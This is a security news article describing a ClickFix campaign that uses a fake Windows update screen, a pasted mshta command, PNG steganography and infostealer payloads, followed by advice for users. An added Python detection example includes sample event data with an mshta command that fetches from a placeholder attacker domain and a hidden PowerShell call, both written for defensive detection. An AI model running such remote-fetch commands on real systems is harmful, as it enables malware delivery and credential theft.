[Image: A fake Windows Security Update screen pictured]
You’re browsing the web when suddenly a Windows update screen takes over your entire monitor. A progress bar is 95% complete, insisting on a "critical security update." Your heart skips a beat—you don't want to interrupt an important system patch. But what if the update itself is the threat?
Cybersecurity researchers have uncovered a sinister new variant of the infamous "ClickFix" malware that is doing exactly that. This sophisticated attack doesn't just mimic a Windows update; it uses an incredibly clever method of hiding malicious code within the pixels of an innocent-looking PNG image to deploy powerful information-stealers.
The discovery, recently detailed by Huntress cybersecurity researchers, reveals a multi-stage attack designed to trick even cautious users into handing over the keys to their digital kingdom.
The Deception: A Full-Screen Fake-Out
The attack begins on the seedy underbelly of the internet, primarily on fake adult websites that mimic popular, legitimate ones. Users are often lured in by malicious ads or fake video players, or are met with a prompt for "age verification."
Once clicked, the trap is sprung. The browser window goes full-screen, displaying a flawless replica of a Microsoft Windows update screen, complete with a progress bar frozen at 95%. The illusion is so convincing that many users believe their system is genuinely updating.
This is where the "social engineering"—the art of human hacking—truly begins. The fake screen instructs the user to press the Windows key + R to open the Run dialog box. A malicious command is already pre-copied to the clipboard, and the user is told to paste it directly. By following these instructions, the user willingly delegates administrative access to the cybercriminals, bypassing many initial security barriers.
The Technical Trickery: Malicious Code Buried in an Image
Once the user pastes and executes the command, a complex and stealthy chain of events is set in motion.
The command runs mshta (Microsoft HTML Application Host), a legitimate Windows tool, to contact a malicious server. From there, a payload is fetched, and the malware immediately runs junk PowerShell code. This obfuscation technique is designed to create noise, confusing security tools like Bitdefender and preventing them from detecting the true malicious activity.
Then comes the masterstroke. The malware deploys a .NET assembly that decrypts a PNG image file. To any normal system or person, this image looks completely harmless. However, the malware is programmed to read the pixel data of the image, where the attackers have hidden encrypted shell instructions.
As the Huntress team explains in their detailed analysis, this technique of hiding code in image pixels is a sophisticated form of steganography, making the malicious payload nearly invisible to traditional detection methods. You can read their full technical breakdown here: Huntress researchers expose the new ClickFix malware variant buried inside images.
After extracting and decrypting the instructions from the PNG, the malware injects them into processes already running on the victim's computer. This final step deploys potent information-stealing malware like Rhadamanthys or LummaC2.
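The execution chain above (Run dialog launches mshta against a remote server, and the fetched payload then spawns PowerShell) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from the Huntress report: it runs two rules over constructed events whose field names loosely follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the domain and command lines are placeholders, not indicators from the campaign.

```python
"""Flag the ClickFix execution chain in process-creation events.
Rule 1: mshta.exe started by explorer.exe (the Run dialog's parent)
        with a remote URL on its command line.
Rule 2: mshta.exe spawning PowerShell (the fetched payload stage)."""
import re
from collections import defaultdict

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events; "update.evil.example" is a placeholder domain.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,            # pasted into Win+R
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://update.evil.example/verify"},
    {"ProcessId": 300, "ParentProcessId": 200,            # payload runs junk PS
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -nop -w hidden -c ping localhost"},
    {"ProcessId": 400, "ParentProcessId": 50,             # benign local .hta
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\setup.hta"},
]

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect_clickfix_chain(events):
    """Return a list of (rule_name, ProcessId) findings in event order."""
    findings = []
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e)
    for e in events:
        if basename(e["Image"]) != "mshta.exe":
            continue
        if basename(e["ParentImage"]) == "explorer.exe" and URL_RE.search(e["CommandLine"]):
            findings.append(("mshta_remote_url_from_explorer", e["ProcessId"]))
        for child in children[e["ProcessId"]]:
            if basename(child["Image"]) in ("powershell.exe", "pwsh.exe"):
                findings.append(("mshta_spawns_powershell", child["ProcessId"]))
    return findings

if __name__ == "__main__":
    for rule, pid in detect_clickfix_chain(EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the Run-dialog launch and its PowerShell child are flagged; the installer-driven local .hta is left alone, which is the kind of exclusion needed to keep this rule quiet in an environment that legitimately uses mshta.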
The Payoff: Your Data, Stolen
These "infostealers" are the final payload and the ultimate goal of the entire operation. They silently scrape everything of value from the infected system:
- Usernames and Passwords (from browsers and stored credentials)
- Browser History and Cookies
- Cryptocurrency Wallets and their keys
- Bank Account Details
- Personal Files and Documents
All this harvested data is then bundled up and sent to servers controlled by the attackers, often located overseas, leading to identity theft, financial loss, and further targeted attacks.
A Persistent and Evolving Threat
Huntress states that this specific ClickFix variant has been circulating since early October 2023, with numerous websites still actively hosting the fake update prompt. The attackers continuously refine their approach, deploying the malware with varying levels of sophistication across different sites.
The researchers even found bizarre elements within the code, such as a cryptic quote from an old UN meeting: “With regard to stage III, we highly recommend the complete destruction of all weapons, as lasting peace cannot be ensured otherwise.” This appears to be another layer of obfuscation or a bizarre calling card, intended to distract and confuse analysts.
How to Protect Yourself
This new ClickFix campaign is a stark reminder that cybercriminals are relying less on technical exploits and more on exploiting human psychology.
To stay safe:
- Be Skeptical of Unsolicited Updates: Microsoft Windows updates never require you to paste commands into the Run window. If you see such a prompt, it is 100% malware.
- Check the URL: Be mindful of the websites you visit. If you land on a suspicious or unfamiliar domain, close the tab immediately.
- Avoid Clicking Ads on Shady Sites: Malvertising is a primary infection vector. Avoid interacting with ads on untrustworthy websites.
- Never Run Unknown Commands: Under no circumstances should you paste and run a command you don't understand, especially one that was "pre-copied" for you.
- Use a Reputable Security Suite: A good antivirus/anti-malware solution can still provide a critical safety net, even against sophisticated threats.
The ClickFix Windows Update scam is, by far, one of the most ingenious and sinister forms of infostealing seen to date. By staying vigilant and questioning unexpected prompts, you can ensure you don't become its next victim.
